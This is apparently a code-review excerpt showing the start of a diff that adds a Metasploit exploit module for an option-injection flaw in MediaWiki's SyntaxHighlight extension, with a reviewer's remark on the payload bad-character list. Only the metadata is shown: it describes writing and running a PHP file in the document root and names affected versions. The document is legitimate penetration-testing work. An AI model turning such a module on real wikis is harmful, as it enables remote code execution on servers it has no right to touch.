modules/exploits/multi/http/mediawiki_syntaxhighlight.rb

```diff
@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
+      'Description'    => %q{
+        This module exploits an option injection vulnerability in the SyntaxHighlight
+        extension of MediaWiki. It tries to create & execute a PHP file in the document root.
+        The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
+
+        This vulnerability affects any MediaWiki installation with SyntaxHighlight version 2.0
+        installed & enabled. This extension ships with the AIO package of MediaWiki version
+        1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and
+        version 1.27.3.
+      },
+      'Author' => 'Yorick Koster',
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'Payload' => { 'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f ,'\"" } ,
```

Comment:
Feel free to use `(0x1..0x1f).to_a.pack('C*')` if you think that it's improving readability :)